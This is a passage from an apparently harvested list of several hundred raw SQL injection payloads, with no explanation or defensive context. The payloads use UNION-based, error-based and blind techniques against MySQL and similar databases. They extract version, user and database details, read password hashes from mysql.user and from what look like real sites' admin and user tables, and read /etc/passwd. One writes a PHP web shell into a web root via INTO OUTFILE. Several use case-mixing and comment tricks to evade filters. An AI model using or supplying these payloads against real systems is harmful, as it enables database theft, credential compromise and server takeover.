1,2,version(),4,5,6-- -15' union select 1,2,version(),4,5,6 -- -15 Union Select 1,2,@@version,4,5,6,7 -15 union select 1,concat(login,0x3a,passwd,0x3a,email),3 from users -- -15 union select 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user -15 union select 1,concat(user,char(58),password,char(58),host),3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user -15 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9-- -15 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,group_concat(0x0b,table_name),22,23,24,25,26,27,28,29,30,31,32 from information_schema.tables where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- -15 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14-- -15 union select 1,concat_ws(0x3a,version(),user()),3,4,5-- -15 UNION SELECT 1,convert(user() using latin1),3,4,convert(version() using latin1)/* -15 union select 1,group_concat(concat_ws(0x3a,login,password) separator 0x0b),3,4,5 from admin -- -15 union select 1,table_name,3,4,5,6 from information_schema.tables -- 15 UNION SELECT 1,user(),3,4,5,6,7,8 -15 union select 1,user(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6/* -15 union select 1,version(),3-- -15 union select 1,version(),3,4-- -15' union select 1,version(),3,4,5,6-- -15 union select 1,version(),3,4,5,6,7,8-- -15 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -15' union select 1,version(),id from users/* -15 union select 1,version(),user(),database(),@@version_compile_os,6,7,8,9,10,11,12-- -15 union select concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database())/* -15 union select concat(version(),user(),database())-- -15 union select concat_ws(0x3a3a,admin_id,name,email_id,password,roll_type) from rupee_admin_user /* -15 union select concat_ws(0x3a,table_schema,table_rows,TABLE_NAMe),2,3,4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.TABLES-- -15 union select concat_ws(0x3a,user(),version()),2/* 15 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4-- -15 union select concat_ws(0x9a,user(),database(),version())/* -15 /*!UnIoN SeLeCt*/ group_cOnCaT(tAblE_naMe) from information_schema.`tables` WHERE TabLE_SCHEma=0x626b626b6162756c5f626b626462-- -15 union select null,null,null,null,column_name,null,null,null,null,null,null,null,null from information_schema.columns where table_name=chr(97)||chr(100)||chr(109)||chr(105)||chr(110)||chr(105)||chr(115)||chr(116)||chr(114)||chr(97)||chr(98)||chr(108)||chr(101)||chr(95)||chr(114)||chr(111)||chr(108)||chr(101)||chr(95)||chr(97)||chr(117)||chr(116)||chr(104)||chr(111)||chr(114)||chr(105)||chr(122)||chr(97)||chr(116)||chr(105)||chr(111)||chr(110)||chr(115)-- -15 union select table_name,null from information_schema.columns where column_name like chr(108)||chr(111)||chr(103)||chr(105)||chr(110) limit 1 offset 2-- 15 union select top 1 1,u_name '::' u_password,3,4,5,6,7 from tblUsers where id=1-- -15' union select unhex(hex(version())),2/* -15 union select unhex(hex(version())),2,3 -- -16000000' union select 1,2,3,concat(username,char(28),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from admin -- -16000 union select 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x71),0x71),6,7,8,9,10,11,12,13 from mysql.user/* 1602' and 1=2 /*!UnIon*/ selECt 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51-- -160331 union select version(),2,3-- 1603 or 1 group by concat((select version()),rand(0)|0) having min(0) 1606 and 1=0 UNION SELECT version() -- -1606 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)-- -1609' union select 1,2,3,4,5,6,7,8,9,0,11,12,concat_ws(0x3a,version(),database(),user()) -- 160 aNd 1=0 /*!UNION*/ SELECT 1,version(),3,4 -- 160 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select TABLE_NAME from information_schema.tables where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit 0,1),1,64),floor(rand(0)*2))) -160 union select 1,2,3,4,5,6,concat_ws(0x2f,user(),database(),version(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18/* -160' union select 1,2,3,4,5,concat_ws(0x3A3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16 from user/* -160 union select 1,2,3,4,5,concat_ws(concat(char(32),char(58),char(32)),user(),version(),database(),@@version_compile_os,@@datadir,@@tmpdir,@@basedir),7,8,9,10,11,12 -160 union select 1,2,3,concat_ws(0x3a,username,password,mail),5,6,7 from users/* -160 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9 -- -160 union select 1,binary(user()),3,4,binary(version()),6/* -160 union select 1,concat(name,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13 FROM ems_members limit 1,1/* -160 union select 1,concat(name,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13 FROM ems_members where id=1/* -161-1 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- 161245965 UNION SELECT 1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -1612' union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6-- -16186 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 from information_schema.columns where table_name='user' -1619 union select 1,2,3,4,5,6,0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from mysql.user into outfile '/var/www/html/tmp/c.php'/* 161 and 1=0 union select 1,2,3,4,5,6,0x4861636b6564206279204f7373747564696f212121,concat_ws(0x3a3a3a,user(),database(),version())-- 161 OR 161=(select db_name()) -161 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_Ws(0x3a3a,Util_Id,util_Civ,Util_Prenom,Util_Nom,Util_Login,Util_Pass,Util_Groupe),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from utilisateur limit 1,1 -- -161 union select 1,2,3,4,5,6,group_concat(table_name separator 0x3a),8 from information_schema.tables where table_schema=0x753637393239-- -161 union select 1,2,3,4,5,concat_ws(0x3a,user(),@@version_compile_os,version()),7 -- -161 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database())-- -161 uNIon seLECt 1,2,3,4,user(),6,7,8,9,10,11 from admin -- -161' union select 1,2,3,concat_ws(0x3a3a,login,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from users limit 1,1 -- -161 union select 1,2,concat_ws(0x3a,version(),user(),@@version_compile_os),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 161 UNION SELECT concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14/* 16209 and 0 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,login,password,email),12,13,14,15,16,17,18,19,20,21 from users 1621' union select 1,2,convert(concat(version(),char(58,58),database(),char(58,58),user()) using cp1251),4,5,6,7,8,9,10,11,12,13,14,15/* 162-999.9 union select 1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14-- 162 and 0 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -162 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13-- -162 union select 1,2,3,concat_ws(char(58),cast(version() as binary),cast(user() as binary),cast(database() as binary)),5 -162 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16/* 162 union select 1,2,concat_ws(0x3a,nickname,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from admins-- -162' union select 1,concat_ws(0x3a,version(),database(),user())-- -162 union select 1,group_concat(table_name separator 0x3a),3 from information_schema.tables where table_schema=0x696e666f6b6f6e-- -162 union select 1,table_name,3 from information_schema.tables/* -162 union select user(),database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version(),25,26,27,282,9,30,31,32,33,34,35,36,37/* -16312 UNION SELECT 1,2,concat(name,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 from users -- -16323 union select 1,concat(id,char(58,58,58),loginname,char(58,58,58),password,char(58,58,58),salt,char(58,58,58),title,char(58,58,58),firstname,char(58,58,58),lastname,char(58,58,58),email,char(58,58,58),inactive),3 from cfw_auth_login 1632 limit 0 union select concat_ws(0x3a,user(),version(),database()),2,3 -163442' union select 1,2,3,concat(user,0x3a,password),5,database(),7,version(),9,0 from mysql.user/* -1635978 union Select 1,2,3,4,5,6,group_concat(table_name separator 0x3a),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59 from information_schema.tables where table_schema=0x7a697073-- -1636 union select 1,2,concat_ws(0x3a3a,id,login,pass,fio,agent),4,5,6,7 from turizm_user -- -1637 union select 1,concat_ws(login,char(58),password),3,4,5,6,7,8 from users/* 16387) union select concat_ws(0x203a20,host,user,password,file_priv),2 from mysql.user/* 163 and 1=0 union select file_priv from mysql.user where user=0x636272-- 163'/*!limit 0 union select 1,2,concat_ws(0x3a,admin_id,admin_name,admin_email,admin_pass),4,5,6,7,8 from shop_admin*/ -- -163 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,user(),database(),version()),20,21,22,23,24,25,26,27,28,29,30,31,32 -- -163 union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110) limit 4,1 -163 union select 1,2,3,concat(version(),0x20,user(),0x20,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -163' union select 1,2,concat_ws(0x3a3a,id,username,password,options,active,date,name,grad),4,5,6 from bnl_users -- -163 union select 1,2,group_concat(login,0x3a,password,0x3a3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users -- 163 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8 limit 1,1 -163 union select 1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/* -1643 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 /* -164' union select 1,2,3,4,5,6,7,8,9,10-- 164 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -164 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),user(),database()),10,11,12,13,14,15,16,17/* -164 union select 1,2,3,4,5,user(),7,8,9,@@version_compile_os,11,database(),version(),14-- -164 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5-- 164 union select 1,2,concat_ws(0x3a,username,pass,email),4,5,6,7,8,9 from Users limit 0,1-- 164 union select 1,2,version(),user(),5,6,7,8,9,database(),11,12,13,14,15,16,17,18,19,20,21,22,23/* -164 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,8,9,10,11 164' union select top 1 1,username from users-- -16509 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/* -1650 union select 1,2,3,4,5,table_name,7,8,9,0,1 from information_schema.tables/* -1652 union select 1,2,3,4,5,version(),7,8,9,0,11,12,13,14,15,16,17,18-- -1653 union select concat_ws(0x2F,version(),id,name,password),2,3,4,5,6,7,8,9 from u45544_ipbd.ipbd_forums/* -1656 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- -1657 union select 1,2,user(),database(),version(),6,7,8,9,10,11,12,13/* 165-999.9 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 165 and 1=0 union(select 1,2,version(),4,5 from information_schema.`tables`) 165 and 1=0 union select concat_ws(0x2a,database(),version(),user(),@@version_compile_os),2 -165' union select 1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9,10,11,12,13,14,15,16/* -165 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -165 union select 1,2,3,concat_ws(0x3a3a,nev,jelszo),5,6,7,8,9,10,11,12,13,14,15,16 from admin limit 0,1 -- -165 union select 1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from users/* -165 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8-- -1663 union all select 1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11 -- 16640) UNION SELECT concat_ws(0x3a,user(),version()),2 -- 1666 union select 1,version(),user(),database()/* 166990 union select 1,database(),3,version(),user(),6 -- 16699' uNioN sElEct 1,2,3,concat(login,':',pass),5,6 from admin/* 166 and ascii(substring((select 1 from site_userlist limit 1),1,1))>1-- 166 limit 0 UNION SELECT null,concat(user(),0x3a,version())/* -166 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11/* -166 union select 1,2,3,4,5,6,7,8,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME) SEPARATOR 0x3C62723E),10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where column_name like 0x257061737325 or column_name like 0x25702577256425-- 166 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15 -166 union select 1,2,3,4,5,unhex(hex(concat_ws(0x3a3a,username,password,email))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from phpuserlogin_users /* -166 union select 1,2,concat_ws(0x3a,username,user_password),4,5,6 from altaru_mainforum2.phpbb3_users limit 1,1-- -166 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 -- -166 union select 1,concat_ws(0x2F,user(),version(),database()),3,4,5,6/* -1670 UNION SELECT 1,2,3,4,5,user(),7,8,database(),version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,now(),sin(pi()-2),32,33,34,35,36,37,38,39,40,41,42,43,44,45,446,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85/* -16717 UNion SElect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,LOAD_FILE(0x2F6574632F706173737764),78 -- -1673 union select 1,2,concat_ws(0x3a,user_id,user_name,user_pass),4,5,6 from users/* 16746876876876876 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 16749 union select concat(email,0x3a,pwd) from users limit 10,10/* -1674' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 16768768759 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18-- 1677-999.9 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- 1678' union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8 from adminxxx -- 167' and 1=0 UnIon selECt 1,2,3,4,group_concat(table_name separator 0x3c62723e),6,7,8,9,10 from information_schema.tables where table_schema=0x6261736b65742d6368656c5f6d61696e -- -167 and 1=2 union select 1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os) -- -167 and 1=2 union select concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2,3,4,5 -- -167' UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- -167 union select 1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6-- -167 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mysql.user -- -167 union select 1,2,user,4,password,6,7 from mysql.user/* -167 union select 1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11 -167 union select null,null,null,aes_decrypt(aes_encrypt(concat_ws(0x3a,database(),user(),version()),0x71),0x71),null,null,null,null,null,null,null,null,null,null,null,null,null -167 union select version(),2,3,4 16813-999.9 union select 1,2,version(),4,5,6,7,8 -- 1681 and 1=0 union select concat_ws(0x3a,version(),user())-- -16827 union select 1,2,3,version(),5,6,7,8 -- -168682 union select concat_ws(0x203a20,table_schema,table_name) from information_schema.tables-- 1687687368768762 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138-- 168768765400 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8-- 168768993 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),2,3,4,5,6,7-- 168 aNd 1=0 UNION SELECT 1,2,3,version() -- -168 union select 1,2,3,4,5,6,7,8,9,0,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18 -- -168 union select 1,2,3,4,5,6,7,8,9 from user/* -168 union select 1,user(),3,database(),5/* -168 union select version(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* 16903 union select 1,2,3,4,5 from wsr/* -1690 and 1=2 union select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),5,6 -- -1690 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 -1692 union select 1,2,3,4,5,6,7,8,9,0,concat_ws(0x3a,version(),user(),database()),12 -- 16933 UNION SELECT 1,2,3,4,5 -1694 union select 1,2,3,concat(version(),0x3a3a,user(),0x3a3a,database()),5,6,7,8,9,0/* -1696 union select 1,concat_ws(0x3a,version(),user(),database()) 169807987960 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11-- 1698 union select 1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables/* 16-999.9 union select 1,2,3,4,concat(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 16-999.9 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11 -- 16-999.9 union select 1,concat_ws(user(),version(),database())-- -1699 union select 1,2,concat_ws(0x3a,orderId,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from orders-- 169 and 1=0 union select 1,2,group_concat(schema_name),4,5,6,7 from information_schema.schemata-- -169 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48-- 169 uniOn selEct 1,2,3,4,5,6,7,version(),9,0,1-- -169 union select 1,2,concat_ws(0x3a,user,Password),4,5,6,7,8 from mysql.user-- 16 and 1=0 union select 1,2,3,concat_ws(user(),version(),database())/* 16 and 1=0 union select 1,2,3,version(),5,database(),7,8,9,10-- 16 and 1=2 union all select 1,concat(user,char(58),password),3,4,5,6,7,8,9,10 from mysql.user/* 16 and 1=2 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10 16 and ascii(lower(substring(version(),1,1)))=52result:false 16 and row(1,2)in(seleCt Count(*),ConCat((seleCt Count(*) from orders limit 1),floor(rand(0)*2))as a from orders x group by a)-- 16 limit 0 union select 1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7 from auth_users limit 3,10/* -16 union all select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7 -- -16 union select 1 -16' union select 1,111,122,133,144,user(),166,177,18,1/* -16 union select 1,2,3,4,5,6,7,8,9,0,1 -- -16 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from users -- 16 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database()),13/* -16 union select 1,2,3,4,5,6,7,8,9,10,11,version() -- -16' union select 1,2,3,4,5,6,7,8,9,10 from admin/* -16 union select 1,2,3,4,5,6,7,8,concat(name,char(58),password),null,11,12,13,14,15,16 from users limit 0,5000/* -16 union select 1,2,3,4,5,6,7,convert(concat_ws(char(58),user,password,host) using latin1),9,10,11,12,13,14,15,16 from mysql.user limit 3,1 -16 union select 1,2,3,4,5,6,7 from mysql.users/* -16 union select 1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19-- -16 union select 1,2,3,4,5,6,concat_ws(0x3a,database(),user( ),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -16 union select 1,2,3,4,5,admin_password,7 from admin/* -16 union select 1,2,3,4,5,column_name,7 from INFORMATION_SCHEMA.columns wheretable_name='admin'/* -16' union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user())/* -16 union select 1,2,3,4,5,convert(table_name using latin1),7,8,9,10,11,12,13,14,15,16 from INFORMATION_SCHEMA.TABLES limit 33,1 -16 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,32,33,34/* 16 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -16 union select 1,2,3,4,convert(version() using latin1),6,7,8,9,10,11,12,13,14,15,16 -16' union select 1,2,3,4,group_concat(table_name),6,7,8,9 from information_schema.tables group by table_schema -- -16 union select 1,2,3,4,unhex(hex(version())),6,7/* -16 union select 1,2,3,column_name from information_schema.columns where table_name=0x6370673133325f7573657273 limit 4,1/* -16 union select 1,2,3,concat(database(),0x3a,version(),0x3a,user()),5,6, -16 union select 1,2,3,concat(user_name,0x3a3a3a,password),5,6,7,8,9,10 from users-- -16 union Select 1,2,3,concat(username,0x3a,password),5,6,7 from login -16 union select 1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16 from phpbb_users -16 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8-- 16 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17 limit 1,1 -16 union select 1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users -- -16 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5 -16 union select 1,2,3,concat_ws(version(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -16 union select 1,2,3,database(),5,6,7,8 /* -16' union select 1,2,3,group_concat(0x0b,username,0x3a,passhash),5,6,7,8,9,10,11 from users -- -16 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x74626C5F726567697374657265645F75736572 -- -16' union select 1,2,3,version(),5-- -16 union select 1,2,concat(database(),0x3a,version()),user(),5,6,7,8,9,10,11,12,13/* -16 union select 1,2,concat(login,0x3a,pwd),4,5 from eurotemp_users/* 16 UNION SELECT 1,2,concat(nick,0x2b,pass,0x2b,icq),4,5,6,7,8,9,10,11,12 from users/* -16 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/* -16 union select 1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6/* -16 union select 1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5,6-- -16' union select 1,2,concat_ws(0x3a,ID_USER,LOGIN_USER,PASS_USER,NOM_USER,PRENOM_USER,GENRE_USER,MAIL_USER,LVL_USER) from FOND_USER limit 3,1 /* -16 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10-- -16 union select 1,2,concat_ws(0x3a,user(),version(),@@version_compile_os),4,5-- -16 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16-- 16 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6 limit 1,1 -16 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9-- -16 union select 1,2,concat_ws(char(58),name,pass,email),4,5,6,7,8,9 from users/* -16 union select 1,2,concat_ws(char(58),username,password),4,5,6,7,8,9,10 from user limit 1 offset 0/* -16 union select 1,2,convert(concat(load_file(0x2f6574632f706173737764)),binary),concat_ws(0x2F,user(),version(),database()),5,6,7,8,9,10 from mysql.user/* -16 union select 1,2,convert(concat_ws(0x3a,user,password,host),binary),4,null,6,7 from mysql.user/* -16 union select 1,2,group_concat(name,char(58),pass),4,5 from user-- -16 union select 1,2,unhex(hex(concat_ws(0x3a3a,pseudo,mdp,admin))),4,5,6,7 from users -- -16 union select 1,2,unhex(hex(concat_ws(0x3a3a,version(),user(),database()))),4,null,6,7/* -16 union select 1,2,unhex(hex(version())),4,5,6,7,8,9,0,11-- -16 union select 1,2,version() -- -16 Union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53-- -16 union select 1,concat(name,0x3a,member_login_key),3 from fm_members limit 1,1 -16 union select 1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6/* -16 union select 1,concat(user_id,0x3a,username,0x3a ,user_password,0x3a,user_email,0x3a,user_icq),3 from phpbb_users limit 1,1/* -16 union select 1,concat(username,0x20,user_password,0x20,user_type),3,4,5,6,7,8,9,10,11,12,13,14 from phpbb_users limit 1,1-- -16' union select 1,concat_ws(0x3a3a,id,email,pass,societe,nom,admin),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from membre -- 16 UNION SELECT 1,concat_ws(0x3a,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15 from signup-- -16 union select 1,concat_ws(0x3a,id,login,password,email,name,priv),3,4,5,6,7,8,9,0,1,2,3,4 from kredo_admins limit 0,1/* -16 union select 1,concat_ws(0x3a,user(),version()),3,4,5-- 16 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/* -16 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6/* -16 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -16 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10-- -16 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5-- -16 union select 1,convert(concat_ws(0x3a,version(),user(),database()) using latin1),3,4/* -16 union select 1,unhex(hex(group_concat(table_name separator 0x0b))),3,4 from information_schema.tables-- -16 union select 1,VERSION(),3,4/* -16 union select 1,version(),3,4,5 -- -16 UnIon selECt 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 -- 16 union select concat(0x3,user(),version()),2/* 16' UNION SELECT CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12,13 LIMIT 1,1/* -16 union select concat(user(),char(58),version(),char(58),database())/* -16 union select 